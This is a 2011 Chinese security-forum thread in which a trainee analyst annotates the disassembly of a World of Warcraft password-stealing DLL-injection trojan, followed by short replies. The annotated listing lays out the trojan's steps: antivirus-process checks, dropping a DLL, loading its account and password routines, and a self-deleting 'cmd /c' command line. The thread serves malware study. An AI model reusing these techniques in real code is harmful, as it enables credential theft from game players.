[LSG]见习成员样本分析 by 伤域[LSG]

伤域 · 发表于 2011-2-18 16:46

本帖最后由伤域于 2011-9-6 00:21 编辑

00402460 >  55             push ebp                                     ; 入口
00402461 8BEC          mov ebp,esp
00402463 B8 2C100000    mov eax,102C
00402468 E8 B3030000    call tuoke.00402820
0040246D 53             push ebx
0040246E 56             push esi
0040246F 57             push edi                                     ; 魔兽世界启动程序
00402470 68 B0414000    push tuoke.004041B0                         ; ASCII "wow.exe"
00402475 E8 46EDFFFF    call tuoke.004011C0
0040247A 8BF0          mov esi,eax
0040247C 83C4 04       add esp,4
0040247F 85F6          test esi,esi
00402481 76 0D          jbe short tuoke.00402490
00402483 68 10270000    push 2710
00402488 FF15 54304000 call dword ptr ds:[<&kernel32.Sleep>]       ; kernel32.Sleep
0040248E 85F6          test esi,esi
00402490 8B3D A8304000 mov edi,dword ptr ds:[<&kernel32.TerminatePro>; 结束进程
00402496 8B1D A4304000 mov ebx,dword ptr ds:[<&kernel32.OpenProcess>>; 打开新进程
0040249C 74 1F          je short tuoke.004024BD
0040249E 6A 00          push 0
004024A0 56             push esi
004024A1 6A 00          push 0
004024A3 6A 01          push 1
004024A5 FFD3          call ebx
004024A7 50             push eax
004024A8 FFD7          call edi
004024AA 68 B0414000    push tuoke.004041B0                         ; ASCII "wow.exe"
004024AF E8 0CEDFFFF    call tuoke.004011C0
004024B4 8BF0          mov esi,eax
004024B6 83C4 04       add esp,4
004024B9 85F6          test esi,esi
004024BB  ^ 75 E1          jnz short tuoke.0040249E
004024BD 68 94414000    push tuoke.00404194                         ; ASCII "BackgroundDownloader.exe"
004024C2 E8 F9ECFFFF    call tuoke.004011C0                         ; 一个后台下载器，游戏更新！
004024C7 83C4 04       add esp,4
004024CA 85C0          test eax,eax
004024CC 74 0C          je short tuoke.004024DA
004024CE 6A 00          push 0
004024D0 50             push eax
004024D1 6A 00          push 0
004024D3 6A 01          push 1
004024D5 FFD3          call ebx
004024D7 50             push eax
004024D8 FFD7          call edi                                     ; 下面调用sleep函数
004024DA 8B1D 54304000 mov ebx,dword ptr ds:[<&kernel32.Sleep>]    ; kernel32.Sleep
004024E0 68 D0070000    push 7D0
004024E5 FFD3          call ebx
004024E7 B9 00010000    mov ecx,100
004024EC 33C0          xor eax,eax
004024EE 8DBD D4EFFFFF lea edi,dword ptr ss:[ebp-102C]
004024F4 F3:AB          rep stos dword ptr es:[edi]
004024F6 B9 00010000    mov ecx,100
004024FB 8DBD D4F3FFFF lea edi,dword ptr ss:[ebp-C2C]
00402501 F3:AB          rep stos dword ptr es:[edi]
00402503 B9 00010000    mov ecx,100
00402508 8DBD D4F7FFFF lea edi,dword ptr ss:[ebp-82C]
0040250E F3:AB          rep stos dword ptr es:[edi]
00402510 B9 00010000    mov ecx,100
00402515 BF C0414000    mov edi,tuoke.004041C0
0040251A F3:AB          rep stos dword ptr es:[edi]
0040251C 8D85 D4F7FFFF lea eax,dword ptr ss:[ebp-82C]
00402522 50             push eax                                     ; 下面是游戏的安装路径
00402523 68 88414000    push tuoke.00404188                         ; ASCII "InstallPath"
00402528 68 54414000    push tuoke.00404154                         ; ASCII "SOFTWARE\Blizzard Entertainment\World of Warcraft"
0040252D 68 02000080    push 80000002
00402532 E8 29EEFFFF    call tuoke.00401360
00402537 83C4 10       add esp,10
0040253A 8D8D D4F7FFFF lea ecx,dword ptr ss:[ebp-82C]
00402540 51             push ecx
00402541 FF15 C0304000 call dword ptr ds:[<&kernel32.lstrlen>]    ; kernel32.lstrlenA
00402547 8B35 3C304000 mov esi,dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
0040254D 85C0          test eax,eax
0040254F 7E 43          jle short tuoke.00402594
00402551 8B3D 40304000 mov edi,dword ptr ds:[<&kernel32.lstrcpy>] ; kernel32.lstrcpyA
00402557 8D95 D4F7FFFF lea edx,dword ptr ss:[ebp-82C]
0040255D 8D85 D4EFFFFF lea eax,dword ptr ss:[ebp-102C]
00402563 52             push edx
00402564 50             push eax
00402565 FFD7          call edi
00402567 8D8D D4EFFFFF lea ecx,dword ptr ss:[ebp-102C]             ; 这个应该是木马了！
0040256D 68 00404000    push tuoke.00404000                         ; ASCII "wfsjowfdsaw.dll"
00402572 51             push ecx
00402573 FFD6          call esi
00402575 8D95 D4F7FFFF lea edx,dword ptr ss:[ebp-82C]
0040257B 8D85 D4F3FFFF lea eax,dword ptr ss:[ebp-C2C]
00402581 52             push edx
00402582 50             push eax
00402583 FFD7          call edi
00402585 8D8D D4F3FFFF lea ecx,dword ptr ss:[ebp-C2C]
0040258B 51             push ecx
0040258C E8 5FF0FFFF    call tuoke.004015F0
00402591 83C4 04       add esp,4                                                    ；这里生成了一个dsound.dll
00402594 B9 00010000    mov ecx,100
00402599 33C0          xor eax,eax
0040259B 8DBD D4FBFFFF lea edi,dword ptr ss:[ebp-42C]
004025A1 68 B80B0000    push 0BB8
004025A6 F3:AB          rep stos dword ptr es:[edi]                ; 调用sleep函数
004025A8 FFD3          call ebx
004025AA 8D95 D4FBFFFF lea edx,dword ptr ss:[ebp-42C]
004025B0 52             push edx
004025B1 68 04010000    push 104                                     ; 获取临时文件指定路径
004025B6 FF15 44304000 call dword ptr ds:[<&kernel32.GetTempPathA>]  ; kernel32.GetTempPathA
004025BC FF15 68304000 call dword ptr ds:[<&kernel32.GetTickCount>]  ; kernel32.GetTickCount
004025C2 68 C4454000    push tuoke.004045C4                         ; 获取从系统启动到现在所经过的毫秒数
004025C7 50             push eax
004025C8 E8 93EFFFFF    call tuoke.00401560
004025CD 83C4 08       add esp,8                                  ; 上面的木马改名了
004025D0 68 4C414000    push tuoke.0040414C                         ; ASCII "n02.dll"
004025D5 68 C4454000    push tuoke.004045C4                         ; 得到经过的毫秒数
004025DA FFD6          call esi
004025DC 8D85 D4FBFFFF lea eax,dword ptr ss:[ebp-42C]             ; 改名为（毫秒数+n02）.dll
004025E2 68 C4454000    push tuoke.004045C4                         ; ASCII "10625375n02.dll"
004025E7 50             push eax
004025E8 FFD6          call esi
004025EA 8D8D D4FBFFFF lea ecx,dword ptr ss:[ebp-42C]
004025F0 51             push ecx
004025F1 6A 6E          push 6E
004025F3 E8 18EAFFFF    call tuoke.00401010
004025F8 83C4 08       add esp,8
004025FB 85C0          test eax,eax
004025FD 0F84 ED010000 je tuoke.004027F0
00402603 8D95 D4FBFFFF lea edx,dword ptr ss:[ebp-42C]
00402609 52             push edx
0040260A E8 E1EAFFFF    call tuoke.004010F0
0040260F 83C4 04       add esp,4
00402612 68 44414000    push tuoke.00404144                         ; ASCII "wow0831"
00402617 6A 00          push 0
00402619 68 01001F00    push 1F0001                                  ; 创建互斥对象
0040261E FF15 A0304000 call dword ptr ds:[<&kernel32.OpenMutexA>] ; kernel32.OpenMutexA
00402624 85C0          test eax,eax
00402626 0F85 C4010000 jnz tuoke.004027F0                         ; 卡巴
0040262C 68 3C414000    push tuoke.0040413C                         ; ASCII "avp.exe"
00402631 E8 8AEBFFFF    call tuoke.004011C0
00402636 83C4 04       add esp,4
00402639 85C0          test eax,eax
0040263B 0F85 84010000 jnz tuoke.004027C5                         ; 瑞星
00402641 68 30414000    push tuoke.00404130                         ; ASCII "RavMonD.exe"
00402646 E8 75EBFFFF    call tuoke.004011C0
0040264B 83C4 04       add esp,4
0040264E 85C0          test eax,eax
00402650 0F85 6F010000 jnz tuoke.004027C5                         ; 360杀毒实时监控
00402656 68 24414000    push tuoke.00404124                         ; ASCII "360rp.exe"
0040265B E8 60EBFFFF    call tuoke.004011C0
00402660 83C4 04       add esp,4
00402663 85C0          test eax,eax
00402665 0F85 5A010000 jnz tuoke.004027C5                         ; 360杀毒主程序
0040266B 68 18414000    push tuoke.00404118                         ; ASCII "360sd.exe"
00402670 E8 4BEBFFFF    call tuoke.004011C0
00402675 83C4 04       add esp,4
00402678 85C0          test eax,eax
0040267A 0F85 45010000 jnz tuoke.004027C5                         ; 360安全卫士实时监控
00402680 68 0C414000    push tuoke.0040410C                         ; ASCII "360tray.exe"
00402685 E8 36EBFFFF    call tuoke.004011C0
0040268A 83C4 04       add esp,4
0040268D 85C0          test eax,eax
0040268F 0F85 30010000 jnz tuoke.004027C5                         ; 360安全卫士主进程，运行了这个，跳走..
00402695 68 00414000    push tuoke.00404100                         ; ASCII "360safe.exe"
0040269A E8 21EBFFFF    call tuoke.004011C0
0040269F 83C4 04       add esp,4
004026A2 85C0          test eax,eax
004026A4 0F85 1B010000 jnz tuoke.004027C5
004026AA 90             nop
004026AB 90             nop
004026AC 90             nop
004026AD 90             nop
004026AE 90             nop
004026AF 90             nop
004026B0 90             nop
004026B1 90             nop
004026B2 90             nop
004026B3 90             nop
004026B4 90             nop
004026B5 E8 26EDFFFF    call tuoke.004013E0
004026BA 8B15 F4404000 mov edx,dword ptr ds:[4040F4]
004026C0 8B45 08       mov eax,dword ptr ss:[ebp+8]
004026C3 8B0D F0404000 mov ecx,dword ptr ds:[4040F0]
004026C9 8955 F4       mov dword ptr ss:[ebp-C],edx
004026CC 8D55 F0       lea edx,dword ptr ss:[ebp-10]
004026CF A3 C0454000    mov dword ptr ds:[4045C0],eax
004026D4 A1 F8404000    mov eax,dword ptr ds:[4040F8]
004026D9 52             push edx
004026DA 6A 04          push 4
004026DC 6A 00          push 0
004026DE 894D F0       mov dword ptr ss:[ebp-10],ecx
004026E1 8A0D FC404000 mov cl,byte ptr ds:[4040FC]
004026E7 6A 04          push 4
004026E9 6A 00          push 0
004026EB 6A FF          push -1
004026ED 8945 F8       mov dword ptr ss:[ebp-8],eax
004026F0 884D FC       mov byte ptr ss:[ebp-4],cl                   ; 假如能运行到这里，创建一个文件映射内核对象
004026F3 FF15 9C304000 call dword ptr ds:[<&kernel32.CreateFileMappi>; kernel32.CreateFileMappingA
004026F9 6A 04          push 4
004026FB 6A 00          push 0
004026FD 8BD8          mov ebx,eax
004026FF 6A 00          push 0
00402701 68 1F000F00    push 0F001F
00402706 53             push ebx                                     ; 上面对象映射到程序地址
00402707 FF15 98304000 call dword ptr ds:[<&kernel32.MapViewOfFile>] ; kernel32.MapViewOfFile
0040270D 8BF0          mov esi,eax
0040270F 8975 08       mov dword ptr ss:[ebp+8],esi                ; 获取当前线程ID
00402712 FF15 94304000 call dword ptr ds:[<&kernel32.GetCurrentThrea>; kernel32.GetCurrentThreadId
00402718 8906          mov dword ptr ds:[esi],eax
0040271A 8D85 D4FBFFFF lea eax,dword ptr ss:[ebp-42C]
00402720 50             push eax                                     ; 加载Dll，并映射到当前进程地址
00402721 FF15 90304000 call dword ptr ds:[<&kernel32.LoadLibraryA>]  ; kernel32.LoadLibraryA
00402727 8BF0          mov esi,eax
00402729 85F6          test esi,esi
0040272B 0F84 C4000000 je tuoke.004027F5                            ; 检索在DLL中的输出函数地址
00402731 8B3D 8C304000 mov edi,dword ptr ds:[<&kernel32.GetProcAddre>; kernel32.GetProcAddress
00402737 68 E8404000    push tuoke.004040E8                         ; ASCII "HHHH"
0040273C 56             push esi                                     ; 账号吧..
0040273D FFD7          call edi
0040273F 68 E0404000    push tuoke.004040E0                         ; ASCII "UUUU"
00402744 56             push esi                                     ; 密码吧..
00402745 A3 C8464000    mov dword ptr ds:[4046C8],eax
0040274A FFD7          call edi
0040274C A3 CC464000    mov dword ptr ds:[4046CC],eax
00402751 FF15 C8464000 call dword ptr ds:[4046C8]
00402757 6A 00          push 0
00402759 6A 00          push 0
0040275B 6A 07          push 7
0040275D 68 FFFF0000    push 0FFFF                                  ; 应该是发送账号密码给木马作者！
00402762 FF15 EC304000 call dword ptr ds:[<&USER32.PostMessageA>] ; USER32.PostMessageA
00402768 83EC 1C       sub esp,1C
0040276B B9 07000000    mov ecx,7
00402770 8D75 D4       lea esi,dword ptr ss:[ebp-2C]
00402773 8BFC          mov edi,esp
00402775 F3:A5          rep movs dword ptr es:[edi],dword ptr ds:[esi>
00402777 E8 44ECFFFF    call tuoke.004013C0
0040277C 83C4 1C       add esp,1C
0040277F 85C0          test eax,eax
00402781 74 1B          je short tuoke.0040279E
00402783 83EC 1C       sub esp,1C
00402786 B9 07000000    mov ecx,7
0040278B 8D75 D4       lea esi,dword ptr ss:[ebp-2C]
0040278E 8BFC          mov edi,esp
00402790 F3:A5          rep movs dword ptr es:[edi],dword ptr ds:[esi>
00402792 E8 29ECFFFF    call tuoke.004013C0
00402797 83C4 1C       add esp,1C
0040279A 85C0          test eax,eax
0040279C  ^ 75 E5          jnz short tuoke.00402783
0040279E 8B4D 08       mov ecx,dword ptr ss:[ebp+8]
004027A1 51             push ecx                                     ; 解除上面的映射
004027A2 FF15 88304000 call dword ptr ds:[<&kernel32.UnmapViewOfFile>; kernel32.UnmapViewOfFile
004027A8 FF15 CC464000 call dword ptr ds:[4046CC]
004027AE 53             push ebx                                     ; 关闭对象
004027AF FF15 BC304000 call dword ptr ds:[<&kernel32.CloseHandle>] ; kernel32.CloseHandle
004027B5 E8 96EAFFFF    call tuoke.00401250
004027BA 33C0          xor eax,eax
004027BC 5F             pop edi
004027BD 5E             pop esi
004027BE 5B             pop ebx
004027BF 8BE5          mov esp,ebp
004027C1 5D             pop ebp
004027C2 C2 1000       retn 10
上面跳到此处..
004027C5 8D95 D4F7FFFF lea edx,dword ptr ss:[ebp-82C]
004027CB 52             push edx
004027CC FF15 C0304000 call dword ptr ds:[<&kernel32.lstrlen>]    ; kernel32.lstrlenA
004027D2 85C0          test eax,eax
004027D4 75 1A          jnz short tuoke.004027F0
004027D6 E8 65FBFFFF    call tuoke.00402340
004027DB A1 3C474000    mov eax,dword ptr ds:[40473C]
004027E0 6A FF          push -1
004027E2 6A 01          push 1
004027E4 68 D4464000    push tuoke.004046D4
004027E9 50             push eax
004027EA FF15 84304000 call dword ptr ds:[<&kernel32.WaitForMultiple>; kernel32.WaitForMultipleObjects
004027F0 E8 5BEAFFFF    call tuoke.00401250                         ; 这个call跟进..
上面call情况..
00401250 81EC 10040000 sub esp,410
00401256 53             push ebx
00401257 56             push esi
00401258 57             push edi
00401259 33DB          xor ebx,ebx
0040125B B9 40000000    mov ecx,40
00401260 33C0          xor eax,eax
00401262 8DBC24 15020000 lea edi,dword ptr ss:[esp+215]
00401269 889C24 14020000 mov byte ptr ss:[esp+214],bl
00401270 F3:AB          rep stos dword ptr es:[edi]
00401272 66:AB          stos word ptr es:[edi]
00401274 AA             stos byte ptr es:[edi]
00401275 8D8424 14020000 lea eax,dword ptr ss:[esp+214]
0040127C 68 04010000    push 104
00401281 50             push eax
00401282 53             push ebx                                     ; 获取游戏全路径
00401283 FF15 28304000 call dword ptr ds:[<&kernel32.GetModuleFileNa>; kernel32.GetModuleFileNameA
00401289 B9 40000000    mov ecx,40
0040128E 33C0          xor eax,eax
00401290 8DBC24 11010000 lea edi,dword ptr ss:[esp+111]
00401297 889C24 10010000 mov byte ptr ss:[esp+110],bl
0040129E F3:AB          rep stos dword ptr es:[edi]
004012A0 66:AB          stos word ptr es:[edi]
004012A2 8D8C24 10010000 lea ecx,dword ptr ss:[esp+110]
004012A9 51             push ecx
004012AA 68 04010000    push 104
004012AF AA             stos byte ptr es:[edi]                      ; 获取临时文件指定路径
004012B0 FF15 44304000 call dword ptr ds:[<&kernel32.GetTempPathA>]  ; kernel32.GetTempPathA
004012B6 8B35 3C304000 mov esi,dword ptr ds:[<&kernel32.lstrcat>] ; kernel32.lstrcatA
004012BC 8D9424 10010000 lea edx,dword ptr ss:[esp+110]             ; 木马。。
004012C3 68 C4454000    push tuoke.004045C4                         ; ASCII "10838671n02.dll"
004012C8 52             push edx
004012C9 FFD6          call esi
004012CB B9 40000000    mov ecx,40
004012D0 33C0          xor eax,eax
004012D2 8D7C24 0D    lea edi,dword ptr ss:[esp+D]
004012D6 885C24 0C    mov byte ptr ss:[esp+C],bl
004012DA F3:AB          rep stos dword ptr es:[edi]
004012DC 66:AB          stos word ptr es:[edi]
004012DE AA             stos byte ptr es:[edi]
004012DF 8D4424 0C    lea eax,dword ptr ss:[esp+C]
004012E3 68 04010000    push 104
004012E8 50             push eax                                     ; 获取系统目录完整路径
004012E9 FF15 50304000 call dword ptr ds:[<&kernel32.GetSystemDirect>; kernel32.GetSystemDirectoryA
004012EF 8D4C24 0C    lea ecx,dword ptr ss:[esp+C]
004012F3 68 50404000    push tuoke.00404050                         ; ASCII "\rundll32.exe"
004012F8 51             push ecx                                     ; 运行这个前应该会先加载上面的木马
004012F9 FFD6          call esi
004012FB B9 40000000    mov ecx,40
00401300 33C0          xor eax,eax
00401302 8DBC24 19030000 lea edi,dword ptr ss:[esp+319]
00401309 889C24 18030000 mov byte ptr ss:[esp+318],bl
00401310 F3:AB          rep stos dword ptr es:[edi]
00401312 66:AB          stos word ptr es:[edi]
00401314 8D9424 14020000 lea edx,dword ptr ss:[esp+214]
0040131B 8D4C24 0C    lea ecx,dword ptr ss:[esp+C]
0040131F AA             stos byte ptr es:[edi]
00401320 52             push edx
00401321 8D8424 14010000 lea eax,dword ptr ss:[esp+114]             ; 删除自身
00401328 68 44404000    push tuoke.00404044                         ; ASCII "DeleteSelf"
0040132D 50             push eax
0040132E 51             push ecx
0040132F 8D9424 28030000 lea edx,dword ptr ss:[esp+328]
00401336 68 30404000    push tuoke.00404030                         ; ASCII "cmd /c %s %s,%s %s"
0040133B 52             push edx
0040133C FF15 F0304000 call dword ptr ds:[<&USER32.wsprintfA>]    ; USER32.wsprintfA
00401342 83C4 18       add esp,18
00401345 8D8424 18030000 lea eax,dword ptr ss:[esp+318]
0040134C 53             push ebx
0040134D 50             push eax
0040134E FF15 4C304000 call dword ptr ds:[<&kernel32.WinExec>]    ; kernel32.WinExec
00401354 53             push ebx                                     ; 下面退出进程，结束了.
00401355 FF15 48304000 call dword ptr ds:[<&kernel32.ExitProcess>] ; kernel32.ExitProcess
总结下：这是一个典型的dll注入型木马，通过游戏运行时同时加载这个dll，
            达到获取账号密码的目的。
最新视频下载地址：http://u.115.com/file/agxfevz0#

是昔流芳 · 发表于 2011-2-18 17:17

本帖最后由是昔流芳于 2011-2-18 17:59 编辑

附件为楼主所分析的样本

小麦 · 发表于 2011-2-18 18:58

必须支持学习中

876571657 · 发表于 2011-2-18 19:33

支持下嘿嘿

屁颠屁颠啊 · 发表于 2011-2-18 20:36

这里的结束应该是指进程分析结束了吧，下面的启动项和服务还没分析还是他没有创建启动项和服务？
下面那么多代码是无用的？

伤域 · 发表于 2011-2-18 22:28

回复屁颠屁颠啊的帖子

没有说完了，请看完视频，而且我的分析确实不对或不完整，除了在临时文件夹生成dll，
在系统目录还生成一个dsu.reg注册表，木马还改了浏览器默认页为www.dao234.com。

家园春正浓 · 发表于 2011-2-19 15:24

楼主分析的很好学习了

伤域 · 发表于 2011-2-24 15:08

视频下载地址已更新：http://u.115.com/file/t551b905df

Apmx · 发表于 2011-4-3 07:44

分析的很具体，学习中

MT198896 · 发表于 2011-4-4 10:13

容。如果您喜欢该程序,

帐号		自动登录	找回密码
密码			注册[Register]

[PC样本分析] [LSG]见习成员样本分析 by 伤域[LSG]

免费评分

[PC样本分析] [LSG]见习成员 样本分析 by 伤域[LSG]

免费评分

[PC样本分析] [LSG]见习成员样本分析 by 伤域[LSG]